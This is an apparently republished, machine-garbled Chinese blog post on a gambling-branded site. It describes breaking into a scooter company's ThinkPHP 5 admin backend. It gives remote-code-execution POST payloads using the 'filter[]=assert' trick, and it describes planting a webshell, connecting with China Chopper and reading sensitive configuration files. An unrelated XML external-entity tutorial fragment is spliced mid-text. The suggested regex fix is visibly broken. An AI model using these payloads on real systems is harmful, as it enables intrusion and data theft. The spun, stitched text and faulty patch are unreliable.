某智能出行网站渗入测试历程 | 申博官网
登录
  • 欢迎进入Sunbet!
  • 如果您觉得Sunbet对你有帮助,那么赶紧使用Ctrl+D 收藏Sunbet并分享出去吧
  • 您好,这里是Sunbet!

某智能出行网站渗入测试历程

Sunbet_安全防护 申博 148次浏览 已收录 0个评论

ThinkPHP 5 RCE tpadmin

[toc]

之前爆出了能应用ThinkPHP5 长途敕令实行破绽,没什么事变干,就简朴的查看了下所涉及到的体系,发明tpadmin背景治理体系以及tpshop商城体系等一切基于ThinkPHP5开辟的体系都不可避免的涌现了这个长途敕令实行破绽。此破绽的应用水平非常简朴,但伤害非常庞大。现在ThinkPHP5 官方已更新并修复此破绽了,然则基于ThinkPHP5的二次开辟的体系依然有一大部份没有修复破绽,因而能够应用此破绽猎取服务器权限。

0x01 发明问题

经由历程Google搜刮tpadmin背景的特性为inrul:/pub/login.html。我找到了一个基于thinkphp5开辟的tpadmin背景治理体系,某均衡车网站的,http://xxx.com/admin/pub/index.php?m=1( <font color=”red”>声明:本文中涌现的域名、IP等均被替代,并不是实在存在,请勿测试</font> )。经由历程测试发明其存在ThinkPHP5 长途敕令实行破绽。

某智能出行网站渗入测试历程

0x02 测试历程

从上图能够瞥见ThinkPHP5版本是5.0.7的,依据l3m0n的这篇ThinkPHP5 RCE破绽剖析,我们能够组织出显现phpinfo的payload:

POST /admin/pub/index.php?m=1 HTTP/1.1

_method=__construct&filter[]=phpinfo&method=get&server[REQUEST_METHOD]=1

某智能出行网站渗入测试历程

上图能够瞥见,网站胜利实行了我的phpinfo敕令,因而我们更进一步,组织一个payload来取得网站服务器权限。

POST /admin/pub/index.php?m=assert($_POST[1]) HTTP/1.1

<O>_method=__construct&filter[]=assert&method=get&server[REQUEST_METHOD]</O>

某智能出行网站渗入测试历程

XML外部实体注入

前言: 最近做了一道WEB题,涉及到XML外部实体注入(即XXE漏洞),恰好也没有系统的学习过,这次就了解一下XXE漏洞。 0x01:简单了解XML XML 指可扩展标记语言(EXtensible Markup Language)
XML 是一种标记语言,很类似 HTML
XML 被设计为传输和存储数据,其焦点是数据的内容
XML 被设计用来结构化、存储以及传输信息
XML 允许创作者定义自己的标签和自己的文档结构
XML的优点: xml是互联网数据传输的重要工具,它可以跨越互联网任何的平台,不受编程语言和操作系统的限制,非常

设置、连上菜刀看看,发明该服务器下布置了多个网站,个中主站也在个中。

某智能出行网站渗入测试历程

某智能出行网站渗入测试历程

我们能够看到,直接放接见主站胜利,说明主站权限也被猎取了。

某智能出行网站渗入测试历程

在主站中,能猎取到大批敏感信息和设置文件等,比方:/ThinkPHP/Conf/convention.php文件:

某智能出行网站渗入测试历程

0x03 修复计划

因为这个破绽的构成缘由在于控制器过滤不严致使长途敕令实行,所以修复要领的话,就直接在在think\App类的module要领的猎取控制器的代码背面加上

if (!preg_match(‘/^[A-Za-z](\w|\.)*$/’, $controller)) {

throw new HttpException(404, ‘controller not exists:’ . $controller);}

假如改完后404,尝试修正正则,加上\/

if (!preg_match(‘/^A-Za-z\/*/’, controller)) {

0x04 参考文章

  • ThinkPHP 5.x RCE 破绽剖析与应用总结-l3m0n


Sunbet|网络安全巴士站声明:该文看法仅代表作者自己,与本平台无关。版权所有丨如未注明 , 均为原创丨本网站采用BY-NC-SA协议进行授权
转载请注明某智能出行网站渗入测试历程
喜欢 (0)
[]
分享 (0)
发表我的评论
取消评论
表情 贴图 加粗 删除线 居中 斜体 签到

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址